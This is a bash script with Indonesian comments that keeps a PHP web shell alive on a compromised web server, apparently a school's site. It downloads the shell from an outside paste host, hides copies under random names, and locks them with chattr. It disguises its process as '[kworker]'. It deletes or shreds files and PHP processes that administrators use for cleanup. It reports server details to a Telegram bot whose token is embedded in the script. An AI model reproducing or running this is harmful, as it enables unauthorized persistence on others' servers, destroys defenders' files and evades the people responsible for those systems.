#!/bin/bash # Konfigurasi - SESUAIKAN DENGAN SERVER ANDA WEB_ROOT="/home/sekolahb/public_html/" # Direktori utama web (bisa diubah) WEB_SHELL_DIR="$WEB_ROOT/" # Direktori webshell (otomatis mengikuti WEB_ROOT) BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719" # Lokasi backup shell TELEGRAM_BOT_TOKEN="7765041082:AAGhlbXBsa4qDiAKbVOSmtZ50Gw45-TcVK8" # Token Telegram Bot TELEGRAM_CHAT_ID="1345261884" # Chat ID Telegram # Fungsi kirim notifikasi ke Telegram send_telegram() { local message="$1" timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \ -d "chat_id=$TELEGRAM_CHAT_ID" \ -d "text=$message" > /dev/null 2>&1 } # Fungsi notifikasi startup send_startup_notification() { local server_ip=$(hostname -I | awk '{print $1}') local server_name=$(hostname) local web_root_info=$(ls -ld "$WEB_ROOT" | awk '{print $3,$4}') send_telegram "🟢 ANTI GEDOR BOT AKTIF! Server: $server_name ($server_ip) Web Root: $WEB_ROOT Shell Dir: $WEB_SHELL_DIR Owner: $web_root_info Status: Monitoring aktif ✅ Sistem siap menghadapi serangan! Siapa berani hapus, langsung hilang duluan!🖕" } # Fungsi deploy ulang shell di direktori acak yang sudah ada deploy_shell() { # Dapatkan daftar direktori yang sudah ada di WEB_ROOT (kecuali direktori sistem) local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf)) # Pilih direktori acak dari daftar local random_dir="${existing_dirs[0]}" # Jika tidak ada direktori yang cocok, gunakan WEB_ROOT if [ -z "$random_dir" ]; then random_dir="$WEB_ROOT" fi # Generate nama file shell acak local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php local new_shell_path="$random_dir/$shell_name" # Download shell dari URL curl -s -o "$new_shell_path" "$BACKUP_SHELL" chmod 400 "$new_shell_path" if [ "$(id -u)" -eq 0 ]; then chattr +i "$new_shell_path" 2>/dev/null fi send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path" echo "$new_shell_path" } # Fungsi hapus file berbahaya delete_intruder() { local target="$1" rm -f "$target" if [ -f "$target" ]; then shred -fuz "$target" 2>/dev/null fi } # Fungsi deteksi dan hapus balik PHP attacker detect_and_delete_php_attacker() { local php_processes=$(pgrep -f "php" | head -10) local attacker_found="" for pid in $php_processes; do local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null) local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ') if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then attacker_found="$php_file" break fi if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then attacker_found="$php_file" break fi done if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then delete_intruder "$attacker_found" send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found" echo "$attacker_found" fi } # Fungsi untuk mengubah script menjadi shell transform_to_shell() { local script_path="$0" local shell_path="$1" # Download shell ke lokasi script curl -s -o "$script_path" "$BACKUP_SHELL" # Set permission chmod 400 "$script_path" # Jika root, tambahkan immutable if [ "$(id -u)" -eq 0 ]; then chattr +i "$script_path" 2>/dev/null fi send_telegram "🔄 SCRIPT TRANSFORMED TO SHELL! Location: $script_path Status: Ready for action" } # Ekspor semua variabel ke subshell export WEB_ROOT WEB_SHELL_DIR BACKUP_SHELL TELEGRAM_BOT_TOKEN TELEGRAM_CHAT_ID # Cek apakah script harus diubah menjadi shell if [[ "$1" == "--transform" ]]; then transform_to_shell "$2" exit 0 fi # Main loop dengan penyamaran proses exec -a "[kworker]" bash -c ' # Definisikan ulang fungsi di dalam subshell source /dev/stdin <<'EOF' # Fungsi kirim notifikasi ke Telegram send_telegram() { local message="$1" timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \ -d "chat_id=$TELEGRAM_CHAT_ID" \ -d "text=$message" > /dev/null 2>&1 } # Fungsi deploy ulang shell deploy_shell() { local existing_dirs=($(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf)) local random_dir="${existing_dirs[0]}" if [ -z "$random_dir" ]; then random_dir="$WEB_ROOT" fi local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php local new_shell_path="$random_dir/$shell_name" curl -s -o "$new_shell_path" "$BACKUP_SHELL" chmod 400 "$new_shell_path" if [ "$(id -u)" -eq 0 ]; then chattr +i "$new_shell_path" 2>/dev/null fi send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path" echo "$new_shell_path" } # Fungsi hapus file berbahaya delete_intruder() { local target="$1" rm -f "$target" if [ -f "$target" ]; then shred -fuz "$target" 2>/dev/null fi } # Fungsi deteksi PHP attacker detect_and_delete_php_attacker() { local php_processes=$(pgrep -f "php" | head -10) local attacker_found="" for pid in $php_processes; do local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null) local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ') if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then attacker_found="$php_file" break fi if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then attacker_found="$php_file" break fi done if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then delete_intruder "$attacker_found" send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found" echo "$attacker_found" fi } EOF # Buat direktori target jika belum ada mkdir -p "$WEB_SHELL_DIR" # Kirim notifikasi startup send_startup_notification # Transform script menjadi shell di lokasi acak random_dir=$(find "$WEB_ROOT" -maxdepth 1 -type d ! -name "$(basename "$WEB_ROOT")" ! -name "cgi-bin" ! -name "error" ! -name "icons" ! -name "shell" 2>/dev/null | shuf | head -1) if [ -z "$random_dir" ]; then random_dir="$WEB_ROOT" fi shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php transform_path="$random_dir/$shell_name" # Jalankan transformasi di background nohup bash -c "sleep 2; $0 --transform '$transform_path'" > /dev/null 2>&1 & # Monitor direktori inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event do [[ -d "$file" ]] && continue # Hapus file yang diotak-atik delete_intruder "$file" # Deteksi dan hapus balik PHP attacker attacker_file=$(detect_and_delete_php_attacker) # Deploy shell baru new_shell=$(deploy_shell) # Kirim notifikasi lengkap if [ -n "$attacker_file" ]; then send_telegram "🚨 PHP ATTACKER DETECTED & DELETED! File: $file Event: $event Attacker: $attacker_file New Shell: $new_shell ✅Mendeteksi file PHP yang dipakai untuk menghapus. ✅Menghapus balik file PHP tersebut secara otomatis. ✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya. Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕" else send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell" fi done ' &